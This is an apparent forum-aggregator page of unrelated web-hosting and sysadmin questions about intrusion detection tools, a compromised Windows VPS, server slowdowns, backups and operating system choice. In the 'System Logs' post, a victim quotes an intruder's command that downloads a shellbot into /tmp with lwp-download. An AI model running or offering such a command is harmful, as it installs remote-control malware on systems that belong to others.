IDS - Intrusion Detection System

Sep 25, 2007

I have recently been using Snort, but I need something, ideally graphically based, so that it is easy to use and find your way around.

Can anyone recommend an IDS product that has a GUI?

Tripwire Intrusion Detection

Jul 30, 2007

I downloaded Tripwire version 2.4.1.1, but the /etc/tripwire/twinstall.sh file is not generated after the installation. I checked the contents of the RPM I downloaded and the script is not there.

How can I prepare the cfg file without this script?

[root@user]# rpm -qpl tripwire-2.4.1.1-1.i386.rpm

/etc/cron.daily/tripwire-check
/etc/tripwire
/etc/tripwire/twcfg.txt
/etc/tripwire/twpol.txt
/usr/sbin/siggen
/usr/sbin/tripwire
/usr/sbin/tripwire-setup-keyfiles
/usr/sbin/twadmin
/usr/sbin/twprint
/usr/share/doc/tripwire-2.4.1.1
/usr/share/doc/tripwire-2.4.1.1/COMMERCIAL
/usr/share/doc/tripwire-2.4.1.1/COPYING
/usr/share/doc/tripwire-2.4.1.1/ChangeLog
/usr/share/doc/tripwire-2.4.1.1/License-Issues
/usr/share/doc/tripwire-2.4.1.1/README.Fedora
/usr/share/doc/tripwire-2.4.1.1/TRADEMARK
/usr/share/doc/tripwire-2.4.1.1/policyguide.txt
/usr/share/doc/tripwire-2.4.1.1/tripwire.gif
/usr/share/man/man4/twconfig.4.gz
/usr/share/man/man4/twpolicy.4.gz
/usr/share/man/man5/twfiles.5.gz
/usr/share/man/man8/siggen.8.gz
/usr/share/man/man8/tripwire.8.gz
/usr/share/man/man8/twadmin.8.gz
/usr/share/man/man8/twintro.8.gz
/usr/share/man/man8/twprint.8.gz
/var/lib/tripwire
/var/lib/tripwire/report

Intrusion Detection Tool Request

Jul 25, 2007

Is there a tool for intrusion detection where a central machine is responsible for requesting file and directory information from clients and reporting changes?

Do you know of any packages, preferably open source, that are available for RHEL 4 and 5?

Server Intrusion: Quick Fixes & What To Do

Nov 7, 2008

server intrusion: quick fixes

Rootkit Detection On A Windows VPS

May 4, 2007

My Windows VPS has come under heavy attack by hackers trying to get through MSFTPSVC for the past month and they finally managed to somehow get in 2 days ago. Somehow, the "Allow anonymous login" setting was selected in my FTP settings and they got in.

They even managed to turn off my firewall. I'm guessing they used a buffer overflow or some other Windows Server 2003 weakness that was fixed in SP2 (too bad SP2 isn't supported by SWSoft yet).

The attacks began less than 1 week after I had signed up with Virpus. I didn't even have my domain name pointing to the server or a site up when the first set of dictionary attacks began. How common is that 0_0 ?

Anyway, since I now know they've gotten in, I've run a virus check and everything looks clean, but I really want to run some kind of rootkit detection software. I've tried everything suggested on the antirootkit website but none of them seem to work on a VPS.

Brute Force Detection (bfd)

Apr 6, 2007

I've just installed bfd on a new server:

[url]

And I'm getting the following in an email every 10 minutes:

Code:
/usr/local/bfd/conf.bfd: line 26:
: command not found
/usr/local/bfd/conf.bfd: line 38:
: command not found
/usr/local/bfd/conf.bfd: line 47:
: command not found
/usr/local/bfd/conf.bfd: line 59:
: command not found
/usr/local/bfd/conf.bfd: line 60:
: command not found
/usr/local/bfd/conf.bfd: line 76:
: command not found
/usr/local/bfd/conf.bfd: line 88:
: command not found

The email is being sent from:

Cron Daemon <root@hostname.com> (replaced hostname myself)

Now I know this isn't R-fx Networks support, but none of their support options seem to work, so I figured I'd post here considering the amount of users that are likely to be using bfd (or you should be).

Hacker Detection On Apache Log Files

Jul 2, 2009

I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.

Does any tool (for example a bash script with grep) exist that would parse the raw Apache logs and report if something is suspicious? Apache logs don't show the POST data, so I am talking to the admin to set up the dump_io Apache mod that enables this.

Or am I going in the wrong direction here, and is there a whole other way to do this? I searched the web and forums for anything like this and didn't find anything.

KVM Over IP System

Jul 23, 2008

I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've come across the Raritan Dominion KX II, which looks pretty promising. Are there any other KVM over IP systems or manufacturers that I should look into? Has anyone used this and can you comment about its reliability?

Slow System

Aug 11, 2008

Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

Allocate System Ram

Jul 22, 2008

I have a VPS account with Plesk and am peaking out my system RAM at 128 MB. The host said to allocate more = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (none that are too big). Most of them are WordPress sites.

Would caching help? Not sure where to look to find this out.

Invoicing System

Dec 27, 2007

Are there any billing software/scripts that enable customers to view their invoice without logging in?

System Cleaning

Aug 6, 2007

Is there anything like system cleaning on a VPS (Linux with Apache)? I need to do system cleaning so that my space and performance can increase.

Is there anything like that in Linux?

System Warning

Mar 21, 2007

I've been getting the following System Warning every hour since I set the server up 5 days ago, and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. I'm hoping someone here can point me in the right direction. I'm running Windows 2003 Web Edition.

Quote:

Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request.
(0xc000005e)".

For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0

System Logs

Jul 26, 2007

I keep receiving hacking attempts from someone accessing my server and running commands like these:

Code:
hubberfix

sh -c cd /tmp;lwp-download [url]
shellbot

I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.

Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

Which Operating System

Feb 18, 2007

There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run cPanel. A lightweight OS is probably preferred but I really have no idea. And in case it helps, the servers have 512 MB of RAM, about 30 - 40 GB of HDD (not actually sure) and an old AMD Duron.

CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware

Whole System Backup

Aug 26, 2007

I just spent over 10 hours on my node configuration (Debian Etch). I have installed a lot of stuff, made a RAID 1 array, control panel, some tools, rules, etc.

I don't want to see something crash some day and have to start over with everything.

What do you guys suggest as a backup method? Maybe some how-to for backing up the WHOLE system with all files, RAID configuration, etc.

I don't need incremental backups at all - I just want to save/backup the current system, and maybe restore it if something bad happens.

Which The Best Operational System For Vps?

Jul 12, 2007

Which of these operating systems is the best one for a VPS?

CentOS 4 (32bit)
CentOS 4 (64bit)
CentOS 5 (32bit)
Fedora Core 3 (32 bit)
Fedora Core 4 (32 bit)
Fedora Core 5 (32bit)
Debian Sarge 3 (32bit)
Gentoo 3 (32 bit)
Opensuse 10 (32 bit)
Suse 9 (64 bit)
Ubuntu 6 (32bit)
Windows 2003 Std

Linux System

Jan 3, 2007

I am planning to start Linux hosting but don't have much knowledge about the Linux operating system... Can I do this without having sufficient knowledge of Linux?

Also, please suggest some good links where I can get basic Linux commands and some kind of Flash tutorials from which I can learn how to work with Apache, DNS, etc.

how to download tar file using Terminal,

Recommended File System

Aug 2, 2009

I have a dedicated server running Linux CentOS.

The default setup of my file system is:

/dev/sda1 450GB

tmpfs 2GB

/usr/tmpDSK 485 MB

My Disk size is 500GB

Ticket System And WHM And Cpanel

Jul 14, 2009

I have a VPS with a WHM/cPanel base. I also installed the RT ticket system, and it installed successfully. I did the same on 5 other servers and it's OK, but on the VPS, due to a different Apache configuration, it gives me:

You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.

Secure Virtuozzo System

Aug 14, 2008

Does someone know a good article on securing a Virtuozzo node/host server?

Which Content Management System (CMS)

Feb 24, 2009

I wondered which Content Management System (CMS) is the best for a website? I read that there are many to choose from; examples are WordPress, Drupal, Joomla, etc. Which CMS is more SEO optimised?

The website I will be setting up will be of the same genre as the following website: startutor.sg. Therefore, I am wondering what CMS to use.

I thought of designing the website using AI or PSD and asking someone to code them (not sure of the terminology used) for me, as I don't know anything about CSS, HTML, etc.

System Clock Off Continuously

May 12, 2009

The system clock on one of our servers seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.

Any ideas what could be causing this? Its uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.

Right now we have a cronjob running ntpdate every few minutes, as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.

Read-only System 3rd Time

Jun 11, 2009

I have a brand new server with CentOS 5.3 and the latest CentOS kernel (2.6.18-128.1.10.el5PAE).

I have brand new HDDs with no errors (the HDDs have only 1000 power-on hours, and the server CPU temperature is normal - between 35-42 C). My server went read-only without any reason. I had to fsck the main / partition (/home is separate); it cleaned the journal, and then the server came back online.

After 2 weeks it happened again - I ran fsck on the / partition again and it recovered the journal as before. I decided to ask the data center to replace the RAID-1 card and memory - they did it. After 3 weeks the server went read-only again.

I ssh'd into the server and saw that the kswapd0 process was using 100% CPU and the load was over 170.

After fsck it recovered the journal on / and the server is available again.

Perl System Mail

Jan 14, 2009

I am trying to write a Perl script that sends mail to a user. I used system(mail -s test) and also sent some messages using this.

But my issue is that I receive the mail with HTML code like <br> and so on.

How do I get a plain mail using this system command?

Which Ticket System Does The Hostgator Use?

Feb 6, 2009

Does anybody know which ticket system Hostgator uses? Or is that their own unique system?

Server Became Read Only System

Mar 29, 2009

I had a Linux server (CentOS 5, MySQL 5, PHP 5, DirectAdmin). I had problems with Apache a few days ago, which is why I hired a sysadmin who tweaked the system (installed the PAE kernel) and made some more configuration changes, and during the last 7-8 days the server worked without any downtime (before this the server had 1-2 downtimes per day -> OOM killer).

Now I have only SSH access (emails and DirectAdmin access give a "wrong password" answer). As my sysadmin told me, it became a read-only system.

I can't even reboot the system.

Quote:

[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)

Only a few commands like this work; most of the commands that I know don't work.

Quote:

[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory

HostMonster.com System Loads

Aug 21, 2008

I have had a shared host with them for a few months, where the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours?

Server Load 2.92 (8 cpus)
Memory Used 42.6 %
Swap Used 0.01 %
Disk /dev/sdc1 (/home) 91 %
Disk /dev/sdd1 (/backup) 90 %
Disk /dev/sde1 (/backup/cpbackup/weekly) 43 %
Disk /dev/ram0 (/ramdisk) 24 %
Disk /dev/sdb1 (/) 22 %

Copyrights 2005-15 www.BigResource.com, All rights reserved